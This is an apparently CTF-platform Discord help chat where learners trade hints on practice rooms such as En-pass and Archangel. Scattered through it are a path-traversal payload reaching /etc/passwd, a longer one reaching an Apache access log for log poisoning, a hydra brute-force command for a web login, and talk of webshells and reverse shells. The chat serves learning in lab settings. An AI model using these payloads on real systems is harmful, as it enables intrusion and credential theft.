spring tartan
#

yeah a bit i guess

solemn onyx
#

more the merier, ping me anytime if you need any more help

ripe hedge
#

yeah that one threw me for a while too

#

and then I facepalm

terse ember
#

I'm getting the result crct but not able to pass the questionπŸ˜…

solemn onyx
#

what command did you exactly run?

terse ember
#

ls | carga -n1 -t -I word sh -c '{ echo word >> shortrockyou.txt; rm word; }'

#

xargs*

solemn onyx
#

What task were you on exactly?

terse ember
#

Your friend trying to run multiple commands in one line, and wanting to create a short version of rockyou.txt, messed up by creating files instead of redirecting the output into "shortrockyou". Now he messed up his home directory by creating a ton of files. He deleted rockyou wordlist in that one liner and can't seem to download it and do all that long process again.

He now seeks help from you, to create the wordlist and remove those extra files in his directory. You being a pro in linux, show him how it's done in one liner way.

Use the following flags in ASCII order:

Take argument as "word"
Verbose
Max number of arguments should be 1 in for each file
terse ember
#

oh I'm so sorry

solemn onyx
terse ember
#

oh sorry!!

solemn onyx
#

just put them in order... and submit the answer

terse ember
#

okay thanks a lot!

solemn onyx
#

np

still fern
#

Any hint on Enpass question 1

stuck fractal
proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

uneven bane
#

Im on En-pass, got the first step, but now I am stuck

pale pasture
#

Could you be more precise about what you tried, what you don't understand etc.

uneven bane
#

ummmm, trying to frame it without giving anything away

ripe hedge
#

rule13, 😦

uneven bane
#

yea, exactly

ripe hedge
#

I'm also stuck there

stuck fractal
#

You're not allowed to ask for help or hints yet @uneven bane

uneven bane
#

my bad, just venting

#

sometimes it helps πŸ™‚

stuck fractal
#

yeah just don't do it in the channel that is used to ask for hints

#

Otherwise, by context, it looks like you're asking for a hint

uneven bane
#

understood, I will take it to general

thorn dagger
#

I'm using the vm available through the website and keep getting an error when trying to initialize metasploit.

#

tried finding another user to su to but I don't see any available in /etc/passwd

#

any hints?

stuck fractal
#

It's already done

thorn dagger
stuck fractal
#

You don't need to start the db either

thorn dagger
#

ah i see

#

thank you

crisp burrow
ripe hedge
#

not for en-pass

crisp burrow
#

lol got something which i'm not sure of

ripe hedge
#

sure, but the room is currently under embargo

crisp burrow
#

alright

ripe hedge
#

try harder

viscid saddle
#

hey guys, is there anyone available to help me with the lfi part in the archangel machine?

ripe hedge
#

where are you at?

#

or not Β―_(ツ)_/Β―

viscid saddle
#

Can i dm?

ripe hedge
#

you can ask here

viscid saddle
#

I figured it out how ti bypass the lfi filter

#

But dont know what to do next

ripe hedge
#

look up log poisoning

green brook
#

can you climb the tree to ../../../../../../etc/passwd

ripe hedge
green brook
#

Im new in here is there a way to team up with someone when you get stuck

astral smelt
#

!docs verify

proud scarabBOT
green brook
#

One second

digital bolt
#

Anyone have a good list of User-Agents that can be used to fuzz user-agent header in Burp Intruder?

stuck fractal
#

Is this for a tryhackme room? @digital bolt

digital bolt
#

Yes and No, try to fuzz something in ||En-Pass|| room

median compass
digital bolt
static echo
#

Stuck at a point in room enpass , anyone available for dm?

median compass
#

still not 72 hours since release

static echo
#

When was it released πŸ˜…

silver otter
median compass
static echo
#

Ahhh ok ...gotta hustle myself I guessπŸ˜…

hollow mica
#

hi. did anyone manage to gain a reverse shell in the room what the shell on the windows machine using powershell? i got a php backdoor going, commands are working fine, it just wont connect back to me. could anyone point me in the right direction?

median compass
#

show us what you're doing, you can surround your screenshots/commands with spoiler tags (double | pipe)

hollow mica
#

i've gotten to the point where i'm able to send commands and receive output like this:

#

although trying to get a reverse shell using powershell i get nothing back, the server does something and a blank page appears. i've also tried running netcat directly on the machine and connecting to mine - this way i get a connection - however i'm not able to interact with anything

median compass
#

can you screenshot your actual connection attempt, what are you running and what messages if any do you get

hollow mica
#

this is what im getting when running netcat on the windows machine directly via rdp

#

however, if im trying to connect via the backdoor using one of many powershell oneliners or even netcat i get nothing back

#

but it's weird that i cant even interact with it while running netcat directly via rdp...

distant python
#

anybody knows a good resource to locate windows privesc exploits? For exmple for MS10-059 I am finding nothing but metasploit ...

median compass
#

and what are you using on the windows side?

hollow mica
median compass
#

that should work I think

hollow mica
#

yet it doesn't... i can even see on the windows powershell window what i type into my machine

#

but nothing happens, it's as if the shell isn't interactive

median compass
#

sorry, i don't know - perhaps try using msfvenom to make a windows x64 shell and use that?

hollow mica
#

np - it's just that the challenge is to gain a reverse shell using a webshell + powershell

#

i was just wondering if something is broken on my side or if it just doesn't work

median compass
#

well there must be something wrong, but I'm afraid I can't see it. afaik that should work

glacial gust
#

try to define the actual location of the powershell.exe file, I think if you don't use a file path it uses the current directory

median compass
#

well that would explain the behavior you're seeing, just echoing commands from one side to the other, with no shell spawned to pick them up and do anything with them

#

it's a new one on me though

pure thistle
#

ok I'm confused doesn't he need to upload a web shell then use powershell's version of the curl cmdlet to get the revers connection?

hollow mica
hollow mica
pure thistle
#

just curious have you tried Invoke-WebRequest in powershell instead of nc.exe

#

I'm a beginner so just asking not suggesting

gusty kite
#

room is still under embargo

sweet hound
#

oh sorry

gusty kite
#

you are not the only one stuck in that room πŸ˜•

hollow mica
pure thistle
#

not by a long shot I'm stuck tooo

pure thistle
hollow mica
#

i was able to get it working; however not with the method they ask us to. i've uploaded a php backdoor and then made a reverse tcp shell using msfvenom and then executed it through the backdoor

stuck fractal
#

@warm nest Not yet

pure thistle
#

ok need help has it been 72 hours since linux modules has been released

#

having trouble with task 6 question 2 i have a command that produces the correct output but is no where near the correct answer my ? is can some one point me to a resource that will explain the command the room author is looking for.

#

there are 2 options/flags/switches that are not needed for the command to work and I don't know how I would go about finding them

rose cape
#

need a sanity check for Mnemonic. got the||image file|| and have downloaded the ||mnemonic tool off of github||but ive been looking absolutely everywhere and cannot seem to find any info to help me use this tool or even understand the decryption process. stuff on this is pretty barren on the internet. anyone have a resource they have that can help me understand this type of stenography or push me in the right direction?

shell crown
#

Need help with agent-sudo room, running hydra to crack ftp using rockyou. But its been 200 words and still the password hasn't been found. Do I need to wait, or am I doing something wrong?

ornate pumice
#

200 words is not very much when you are trying to brute force something lol. I can confirm the password is in rockyou.txt . Keep going πŸ™‚ @shell crown

#

@shell crown It's actually between lines 200 and 300 if that helps πŸ˜‰

#

(assuming we are using the same version of rockyou.txt ...

shell crown
ornate pumice
#

@shell crown It's not far after line 200 in rockyou, just checked πŸ™‚

shell crown
#

Yup. Got itπŸ˜…

pure thistle
white salmon
#

can anyone help me with this hydra syntax ?

#

hydra -l username -P log1.txt 10.10.10.10/animalmail http-post-form "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1"

#

this is returning an error

white salmon
#

ahh... figured it out

ornate pumice
white salmon
#

thank you... i need to explain to my brain that i need to search for "tool -cheatsheet" for better results

candid nimbus
# rose cape need a sanity check for Mnemonic. got the||image file|| and have downloaded the ...

To be honest if you look at it it's just a substitution cipher, if you've got the tool, you should have the list of what value translates to plaintext ||the import at the beginning is the name of the substitution key on Mnemonic github page. Those values are then further transformed using rgb values from the image, but....||. I just used an online tool to find the largest common factor of all the values in the cipher text and didn't use the Mnemonic script at all

rugged fossil
rugged fossil
quasi basin
#

which VMs on THM are goof for ejpt preparation

magic bone
#

Hey can anyone provide me a hint on mission25 flag in room Linux Agency... I am kinda stuck

candid nimbus
severe jungle
#

hi, did someone can help me on Enpass room? I already got the id_rsa and password

simple mountain
#

@severe jungle Please check the pins re: Enpass

severe jungle
simple mountain
#

Not if its about Enpass.

severe jungle
#

alright sorry

simple mountain
#

It's only because it's a new room. Keep at it, and if you are still stuck tomorrow after 7pm, Then you are welcome to ask for help πŸ™‚

still dust
#

Permission denied (publickey) error for ssh in enpass room is normal or i am doing wrong?

ripe hedge
#

neither confirm nor deny, room is under embargo until tomorrow evening GMT

simple mountain
#

@still dust Please see the Pins in this channel πŸ™‚

ruby cloud
gusty kite
ashen marsh
#

Hi everyone,
I'm stuck at the privilege escalation to root in "Sustah" room
Any small hint?

ripe hedge
#

you don't have sudo, but it's something similar

#

linpeas spots it

ashen marsh
ripe hedge
#

did for me

ashen marsh
#

my friend told me as you said too

ripe hedge
#

||[+] Checking doas.conf
permit nopass kiran as root cmd rsync||

ashen marsh
#

||/etc/doas.conf: No such file or directory||

ripe hedge
#

is it meant to be there?

ashen marsh
#

yes I googled that

ripe hedge
#

hmm, that's odd

ashen marsh
ripe hedge
#

try the command

#

if that doesn't work, then terminate and redeploy the box and try again

ashen marsh
#

Thanks ❀️

ripe hedge
#

unless the room changed that was the intended path

ashen marsh
#

same problem, so it might be a bug

lost crag
ripe hedge
#

ah not a default location though

#

find it then

sweet hound
pure thistle
#

still need help on linux modules task 6 ?1 how do I insert a new line in awk I know the /n but what comes before the /n

sweet hound
pulsar flame
#

Hi Guys and Gals, I'm currently working through the room Internal on the offensive learning path and ive hit a dead end i have managed to || get a reverse shell through word press, i've run Linpeas and linenum and found DB creds for phpmyadmin, i (think) i have dumped what i can from the DB and found a sha256 token that i can't crack and a hash containing the WP password. || im still pretty new to this and can assume i have missed something in the || linpeas/linenum results|| I have made a promise to my self to try not to use the write ups so if some one could give me a little nudge in the right direction for gaining user access i'd be really greatful πŸ˜„ Happy hunting πŸ˜‰

ripe hedge
#

db creds don't seem to be helpful

#

keep sniffing around the filesystem

#

you got a reverse shell, this is good

pulsar flame
#

@ripe hedge thank you! i have tried the usual ||/var/backups and checking to see if i can write/read to passwd or shadow|| i will go back to the drawingboard (or filesystem πŸ˜‰ ) and keep digging

ripe hedge
#

good hunting

ashen marsh
ripe hedge
#

was default when I did it

white salmon
magic bone
sweet hound
stuck fractal
pulsar flame
#

@ripe hedge got it! thank you πŸ˜„

stuck fractal
#

@bronze fox Your home dir is not /home

#

/home is the home dir but not your home dir

candid nimbus
bronze fox
#

great help thanks @stuck fractal

pulsar flame
#

@ripe hedge and root! 3 days (with work inbetween) it def earned the red level!

ripe hedge
#

gj

pulsar flame
#

@ripe hedge thanks :D, felt like a proper achievement. ive moved on to the buffer overflow section, the first room states its not to teach you the basics but for OSCP prep - do you have any recommendations on rooms for complete beginners with buffer overflow?

ripe hedge
#

there's binex

pulsar flame
#

cheers, they will be my next ones before continuing the path πŸ˜„

ripe hedge
pulsar flame
#

so in this order would be best? intro to x86-64 > bof1 > binex

pale pasture
#

bof1 is still really hard for a first BOF, I paradoxally found the OSCP prep much easier, maybe because you have tools that almost make all the work for you? For bof1 you'll have to write a bit of c or asm. Also you might want to check the computerphile video on the subject, I didn't find better explanation (for me) @pulsar flame

pulsar flame
simple mountain
#

Do not provide or ask for help or hints for both Investigating Windows 2.0/3.x rooms until 15th Feb, 7pm (GMT)

solemn onyx
#

Can I ask hints for enpass now??

trim haven
#

Guys it says the 13th in pins

acoustic steppe
low venture
#

12th

trim haven
#

GMT

#

7pm

acoustic steppe
trim haven
#

It's the 12th @ 9pm rn

ashen helm
shut pollen
#

Are we allowed to ask for Enpass ?

acoustic steppe
magic galleon
# pure thistle nvm i think i figured it out

How did you do it? im missing the hyphens in the command ||awk 'BEGIN{---- -- OFS=":"} {print $1,$4}' awk.txt|| (used hyphens because using asterisks bolds the text. I already have the "correct" output

pure thistle
magic galleon
ashen helm
digital vector
stuck fractal
digital vector
#

@stuck fractal golden eye , task 1 , 4th quest

stuck fractal
#

It's not encryption, do you want a hint or just the type of encoding?

digital vector
#

The type of Encoding !

stuck fractal
digital vector
#

oh this uh , smh . THANKS πŸ™‚

red arch
candid nimbus
ruby cloud
west sail
#

this is why I use python

simple mountain
#

Do not provide or ask for help or hints for Inferno room until 15th Feb, 7pm (GMT)

grim tapir
#

Good evening. I did ask this in the room-help channel but maybe it is better to ask it here. I'm doing Overpass 3 and I'm on PE for the second user. I've seen the vulnerability, but for some reason i can't mount the <thing> since i am getting an error: mount.nfs: requested NFS version or transport protocol is not supported. I can't also get the showmount -e to work since I am also getting an error: clnt_create: RPC: Program not registered.

Did anyone experienced this? Is it something on the machine or the way I am doing the tunnel?

stuck fractal
#

It's ||NFSv4|| so you don't need showmount

#

IDK how you're trying to mount it, but the fact above tells you more about how to mount it

#

Also, if you asked in #room-help then I'd recommend checking the writeups. That channel requires you to have checked the writeups first.

grim tapir
#

Well i did see the path in the enumeration, the showmount was to make sure i could access the mount points, but i keep getting the version or transport protocol not supported. Maybe i need an extra flag in order to restrict tcp traffic or set the version to 4. Regarding the #room-help, i've deleted the request πŸ™‚

stuck fractal
#

showmount uses RPC

#

v4 doesn't use RPC at all

#

If you haven't forwarded RPC too, showmount won't work

grim tapir
#

maybe i am not setting the forwarding correctly, gonna check it out again (and drop the showmount)

#

thank you vm

pure thistle
#

my issue was resolved by switching from my desktop to my laptop "i don't know why or how"

daring relic
#

anybody working on Inferno?

#

This part right here ----> The machine is designed to be real-life and is perfect for newbies starting out in penetration testing

#

really?

magic bone
worldly adder
#

Room: Physical Security Intro , section: hardware bypassing, ques: What item can be used to widen the gaps between doors and door frames or between double doors to allow for other bypass tools to be used? This tool is also common for automobile entry. I didn't find any relevant answer anyone who have done this need your help. #room-help

white salmon
#

Guys Can anyone help me with Priv Esc...I got the username and got into the shell but idk how to get to root in Enpass Room....Can anyone suggest me something? or any room that i need to go through first

pastel charm
#

sorry to disturb you guys i am working on Binex machine a Bof machine

#

and i need a little help. I successfully find out the offset

#

also return address but the i don't know what wrong

sweet hound
coarse hornet
#

At last I finished En-Pass

#

😩

pastel charm
#

Boommm!!!!! Binex is done.

ripe hedge
solemn onyx
#

En-pass-ed 😭❀️

obtuse gulch
grim tapir
hexed crescent
eager saffron
#

Hey would be nice if someone could hint me about task 6 = awk
in room linuxmodules
I try with :
awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt
but seems it is not the right answer there

eager saffron
ruby cloud
#

sure, if you look for messages from me I already gave the hint bud

eager saffron
#

@ruby cloud you mean "reading the manpage of awk and the tutorials the creator links in the exercise" ?

ruby cloud
#

nope

solemn onyx
eager saffron
#

Yes I did, but I dont get it

#

OK I made it, thanks

#

but in terminal these answer gives me an error:

#

||awk 'BEGIN{FS="n" OFS=":"} {print $1,$4}' awk.txt
awk: cmd. line:1: BEGIN{FS="n" OFS=":"} {print $1,$4}
awk: cmd. line:1: ^ syntax error||

ripe hedge
#

why the n?

eager saffron
#

to end line when numbers are present ??

ripe hedge
#

FS == Field Separator

#

of the input

solemn onyx
ripe hedge
#

^

eager saffron
#

||awk 'BEGIN{FS=" " OFS=":"} {print $1,$4}' awk.txt
awk: cmd. line:1: BEGIN{FS=" " OFS=":"} {print $1,$4}
awk: cmd. line:1: ^ syntax error||
gives an error too

solemn onyx
#

Also, separate those attributes using a semicolon(;) FS=" "; OFS=":"

eager saffron
#

ok now It works

ripe hedge
#

yeah that part threw me off for a while

eager saffron
#

kind a hard part

#

but when I read sed part I think I need a break πŸ˜›

#

good room mate

solemn onyx
solemn onyx
true widget
#

I m solving overpass and found an admin panel but could nt do much.A small nudge would be highly appreciated!

stuck fractal
#

If you have access then you should see something obvious

#

If you don't have access, you're gonna wanna gain access

true widget
stuck fractal
#

That won't work

#

No db involved

true widget
stuck fractal
#

Try things and see what happens

true widget
proven bridge
#

Any hints on en-pass Room?

astral smelt
#

Not yet, 2 hours and 25 mins and the embargo will be over

strong cobalt
#

HI guys, I'm a bit new here and I'm stuck on a challenge that i may need some advise one

stuck fractal
#

We don't know what you need help with until you ask

strong cobalt
#

for Network Services 2 exploiting NFS when i try to run the bash file it results a: ./bash: line 7: syntax error near unexpected token newline' ./bash: line 7: <!DOCTYPE html>'

#

sorry about that, forgot to hit enter...

stuck fractal
strong cobalt
#

oooh, in that case Thank you. walks away in id10t.

#

have a nice day

waxen silo
#

I'm working on investigatingwindows, can't seem to find the command and control server IP. I've answered every other question, so I must be missing something obvious

#

figured it out, needed to check the place used to poison DNS πŸ™‚

white salmon
#

Can I get a hint for Intro to Python Room Task 12 ?

#

Am I suppose to automate a script to decode the strings 15 times 😳

#

If so, it sounds like fun

rose cape
#

hey guys im on task2 archangel trying to get RCE via ||access logs|| im just having a bit of trouble.. anyone have any idea why the ||access.log|| isnt showing up? this is my payload ||view=/var/www/html/development_testing/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../var/log/apache2/access.log||

#

can access other resources with this payload fine

quiet stump
rose cape
quiet stump
rose cape
ripe hedge
#

So now that we're allowed, can I get a hint on where to look for the user on enpass?

#

I am at an impasse

astral smelt
#

Try to bypass at a certain place

ripe hedge
#

Using headers?

#

Err

#

Methods sorry

#

The ||fake 403|| looks suspicious but I can figure out why yet

astral smelt
#

You need to || bypass that 403.php with a character, tiny bit like LFI||

ripe hedge
#

Yeah ok I'll look up the tables again

#

At least I was on the right track

ashen scaffold
astral smelt
#

Yep

ashen scaffold
#

Lol. Lordy πŸ€“

astral smelt
#

Once you have foothold it's pretty simple from there

ripe hedge
#

I assumed as much

#

I tried a couple things but I hope it's not a null

snow crest
#

someone can put me on the right way about privs elevate on enpass?

#

im stuck

#

Im trying SETUID

#

exploit kernel

#

some help?

astral smelt
#

||check a certain directory||

snow crest
#

ummm...

#

oki

#

thanks

plucky meadow
#

Guys for the En-Pass room I found eveything except a ||user name||, can i get some hints please

astral smelt
#

||Try to bypass 403.php||

stuck fractal
#

@simple mountain enpass embargo up btw

plucky meadow
simple mountain
#

Ah, Merci

astral smelt
#

You probably didn't specify it to||add .php on the end||

plucky meadow
astral smelt
#

Oh strange i don't then

snow crest
ripe hedge
#

hmm

ripe hedge
astral smelt
#

Yea it's kind of a weird one tbh

#

||you only need one part of the LFI and have a character on the end of it||

stoic sleet
#

is it ||Null||?

astral smelt
#

No

ripe hedge
#

I had missed another character but now I broke the box...

#

a thing I need got chpwned

#

ok that was a strange box

astral smelt
#

Yea it was

#

I'm sure you found the privesc much more simpler

ripe hedge
#

yeah. never seen it before but google had the info

#

also, socat is ❀️

astral smelt
#

Yea I had to google for it as well

ripe hedge
#

so yeah I just had to try harder I guess

#

I had tried a couple fuzzers

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

@shut pollen It's pinned. It's still under embargo

shut pollen
#

What's embargo ? Sorry I don't know that.

stuck fractal
shut pollen
#

Okay sorry pepehands

ashen scaffold
ripe hedge
#

😦

#

I was on the right track, but didn't try hard enough I guess

ashen scaffold
#

I never knew it was a thing

stuck fractal
#

Is this for a room?

#

@warped sinew Please don't spoil possible exploits for rooms that are under embargo

warped sinew
#

@stuck fractal Understood

white salmon
#

Hi everyone! I'm another person stuck on user on En-pass. I've read the hints above, but I'm still struggling. ||I've tried bypassing 403.php by typing things like ../../../../../etc/passwd or http://ip:8001/./403.php.|| Is there anything I can read about that might get me on the right track?

astral smelt
#

You're on the right track

white salmon
crisp burrow
#

For en-pass I created custom wordlist with the potential usernames(sau, cimihan, sadman) i got and then got ssh user via usename enumeration(openssh expliot). Is this not even a thing then? I din look much on 403.php tho

frigid summit
#

I used ||"awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt"|| in task 2 of awk section in Linux Modules. And it displayed the desired answer. Only thing is that the task requires something else. What am I missing?

frigid summit
pure thistle
#

anybody available for a hint on enpass stuck at root flag I'v uploaded linpeas and ran it didn't find anything useful what should i be looking for

ashen scaffold
#

@pure thistle Manually browse some directories

solemn onyx
ornate pumice
pure thistle
#

thanks guys but its getting late may try again tomorrow

echo thunder
#

hello everyone.Did some of you completed room Keldagrim Forge?